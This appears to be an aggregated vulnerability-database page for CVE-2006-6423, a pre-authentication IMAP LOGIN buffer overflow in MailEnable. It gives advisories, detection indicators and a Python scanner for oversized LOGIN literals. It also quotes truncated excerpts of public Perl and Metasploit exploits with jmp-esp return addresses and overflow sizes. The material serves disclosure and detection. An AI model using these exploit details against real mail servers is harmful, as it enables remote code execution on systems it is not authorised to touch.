CVE-2006-6423
Published 2006-12-12
Priority P2 · EPSS 67% · critical · CVSS 2.0 base score 10
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: available
EPSS: 67.04% (99.2nd percentile)
Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.
Affected
53 ranges · showing 25 (all extracted rows are identical)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mailenable | mailenable_enterprise | — | — |
Detection & IOCs (extracted from sources)
Return-address bytes (jmp esp gadgets) used by the public exploits:
- `\xf8\xfe\x5a\x7c` (jmp esp, Win2K Server SP4 KERNEL32.dll 5.0.2195.7099)
- `\xe2\x48\xe6\x77` (jmp esp, WinXP SP0 KERNEL32.dll 5.1.2600.0)
- `\x06\x38\xe6\x77` (jmp esp, WinXP SP1 KERNEL32.dll 5.1.2600.11061)
- `\xd9\xae\x80\x7c` (jmp esp, WinXP SP2 KERNEL32.dll 5.1.2600.21802)
- `\x62\x51\xeb\x77` (jmp esp, Win2K3 SP1 KERNEL32.dll 5.2.3790.18300)
- Detect IMAP LOGIN commands with a literal size specifier (curly-brace notation) followed by an oversized payload: the exploit sends a LOGIN command with a literal argument (e.g., {10}, {24}, {1022}) and then a buffer of 556+ bytes to overflow the stack.
- Alert on IMAP LOGIN literal continuation payloads exceeding ~550 bytes on TCP port 143, the overflow threshold used by all known exploit variants.
- A bind shell on port 1337 is spawned by the shellcode after successful exploitation; monitor for unexpected listening services on port 1337 on Windows IMAP servers.
- The Metasploit module targets MEAISP.DLL at a fixed return address (0x10049abb); presence of this DLL at this version in a MailEnable installation indicates a vulnerable target.
- The exploit treats \x00\x0a\x0d\x20 as bad characters (excluded) in payload construction; IMAP traffic containing long runs of uppercase alphabetic characters (rand_text_alpha_upper) immediately after a LOGIN literal continuation is a strong indicator of exploitation.
- EXITFUNC is set to 'thread', so the IMAP service process survives exploitation; look for anomalous child threads spawned from the MailEnable IMAP process after a malformed LOGIN sequence.
- The Metasploit module has only a single hardcoded target (MailEnable 2.35 Pro with a specific MEAISP.DLL return address); the Perl exploits cover versions 2.32–2.35 with OS-specific jmp-esp gadgets from KERNEL32.dll, so detection must account for multiple return addresses across OS versions.
- CVE-2006-6423 (buffer overflow in LOGIN) is explicitly noted as a different issue from CVE-2006-6484 (null pointer dereference in the IMAP service); detections should not conflate the two vulnerabilities.
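One way to implement the LOGIN-literal checks listed above (the ~550-byte threshold and the uppercase-filler indicator) over a captured client-to-server IMAP stream, as an added example that is not part of the original page or of any tool it indexes; the sample streams, the `UPPER_RUN_MIN` value and the `Finding` type are constructed here.

```python
import re
from dataclasses import dataclass, field

# The ~550-byte literal threshold comes from the detection notes on this page;
# the uppercase-run minimum is a constructed tuning value.
LITERAL_THRESHOLD = 550
UPPER_RUN_MIN = 200

# Matches "tag LOGIN [user ]{n}CRLF": a LOGIN command announcing an n-byte literal.
LOGIN_LITERAL = re.compile(rb"^(\S+) LOGIN (?:\S+ )?\{(\d+)\}\r\n", re.I | re.M)

@dataclass
class Finding:
    tag: bytes
    declared_size: int
    payload_len: int
    upper_run: int
    reasons: list = field(default_factory=list)

def scan_login_literals(client_stream: bytes) -> list:
    """Return one Finding per LOGIN literal in a client->server IMAP stream that
    shows an overflow indicator: oversized declared literal, oversized payload
    actually sent, or a long run of uppercase letters (rand_text_alpha_upper)."""
    findings = []
    for m in LOGIN_LITERAL.finditer(client_stream):
        declared = int(m.group(2))
        # What the client sent after the announcement, up to the next CRLF:
        # the literal bytes plus whatever remains of the command line.
        payload = client_stream[m.end():].split(b"\r\n", 1)[0]
        upper_run = max((len(r) for r in re.findall(rb"[A-Z]+", payload)), default=0)
        reasons = []
        if declared > LITERAL_THRESHOLD:
            reasons.append("declared_literal_over_threshold")
        if len(payload) > LITERAL_THRESHOLD:
            reasons.append("payload_over_threshold")
        if upper_run >= UPPER_RUN_MIN:
            reasons.append("long_uppercase_run")
        if reasons:
            findings.append(Finding(m.group(1), declared, len(payload), upper_run, reasons))
    return findings

# Constructed sample streams: two ordinary literal logins, two matching the IOCs.
BENIGN = b"a001 LOGIN {5}\r\nalice secret\r\n" b"a002 LOGIN bob {6}\r\nhunter\r\n"
SUSPECT = (b"a003 LOGIN {10}\r\n" + b"A" * 556 + b"\r\n"
           + b"a004 LOGIN {1022}\r\n" + b"a" * 1022 + b"\r\n")

if __name__ == "__main__":
    for f in scan_login_literals(BENIGN + SUSPECT):
        print(f.tag.decode(), f.declared_size, f.payload_len, f.reasons)
```

Ordinary clients send exactly the declared literal followed by the rest of the command, so the benign stream produces no findings while both suspect commands are reported with the reasons that fired.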
GHSA
GHSA-ff9v-9xjv-cj27 (CVE-2006-6423, HIGH) · ghsa_unreviewed · 2022-05-01
Stack-based buffer overflow in the IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.35, Professional Edition 1.6 through 1.84, and Enterprise Edition 1.1 through 1.41 allows remote attackers to execute arbitrary code via a pre-authentication command followed by a crafted parameter and a long string, as addressed by the ME-10025 hotfix.
GHSA
GHSA-5crp-85wp-vwcp (CVE-2006-6484, CRITICAL) · ghsa_unreviewed · 2022-05-01 · CVSS 10.0
The IMAP service for MailEnable Professional and Enterprise Edition 2.0 through 2.34, Professional Edition 1.6 through 1.83, and Enterprise Edition 1.1 through 1.40 allows remote attackers to cause a denial of service (crash) via unspecified vectors that trigger a null pointer dereference, as addressed by the ME-10023 hotfix, and a different issue than CVE-2006-6423. NOTE: some details were obtained from third party information.
GHSA
GHSA-qh23-548p-jvf7 (CVE-2007-1301, CRITICAL) · ghsa_unreviewed · 2022-05-01 · CVSS 10.0
Stack-based buffer overflow in the IMAP service in MailEnable Enterprise and Professional Editions 2.37 and earlier allows remote authenticated users to execute arbitrary code via a long argument to the APPEND command. NOTE: this is probably different than CVE-2006-6423.
No detection rules found.
Exploit-DB
MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit) · exploitdb · 2010-04-30 · CVE-2006-6423
---
##
# $Id: mailenable_login.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'MailEnable IMAPD (2.35) Login Request Buffer Overflow',
            'Description'    => %q{
                MailEnable's IMAP server contains a buffer overflow
                vulnerability in the Login command.
            },
            'Author'         => [ 'MC' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 9179 $',
            'References'     =>
                [
                    [ 'CVE', '2006-6423'],
                    [ 'OSVDB', '32125'],
                    [ 'BID', '21492'],
                    [ 'URL', 'http://
Exploit-DB
MailEnable IMAPD Professional 2.35 - Remote Buffer Overflow · exploitdb · 2007-02-16 · CVE-2006-6423
---
#!/usr/bin/perl
#
# maildisable-v6.pl
#
# Mail Enable Professional jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
                "\xef\xbe\xad\xde"  # DoS
              );
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else
Exploit-DB
MailEnable IMAPD Enterprise 2.32 < 2.34 - Remote Buffer Overflow · exploitdb · 2007-02-16 · CVE-2006-6423
---
# jmp %esp
my @offsets = ( "\xf8\xfe\x5a\x7c", # Win2K Server SP4 KERNEL32.dll 5.0.2195.7099
                "\xe2\x48\xe6\x77", # WinXP SP0 KERNEL32.dll 5.1.2600.0
                "\x06\x38\xe6\x77", # WinXP SP1 KERNEL32.dll 5.1.2600.11061
                "\xd9\xae\x80\x7c", # WinXP SP2 KERNEL32.dll 5.1.2600.21802
                "\x62\x51\xeb\x77", # Win2K3 SP1 KERNEL32.dll 5.2.3790.18300
                "\xef\xbe\xad\xde"  # DoS
              );
&print_header;
my $target;
my $offset;
if (defined($arg{'t'})) { $target = $arg{'t'} }
if (defined($arg{'n'})) { $offset = $arg{'n'} }
if (!(defined($target))) { &usage; }
if (!(defined($offset))) { $offset = 0; }
if ($offset > $#offsets) {
print("only ".($#offsets+1)." targets known!!\n");
exit(1);
} else {
$offset = $offsets[$offset];
}
my $imapd_port = 143;
my $send_delay = 2;
my $NOP = 'A';
my $STAR
Metasploit
MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
MailEnable's IMAP server contains a buffer overflow vulnerability in the Login command.
No writeups or analysis indexed.
References
- http://secunia.com/advisories/23201
- http://secunia.com/secunia_research/2006-73/advisory/
- http://securityreason.com/securityalert/2022
- http://www.mailenable.com/hotfix/
- http://www.securityfocus.com/archive/1/454075/100/0/threaded
- http://www.securityfocus.com/bid/21492
- https://exchange.xforce.ibmcloud.com/vulnerabilities/30796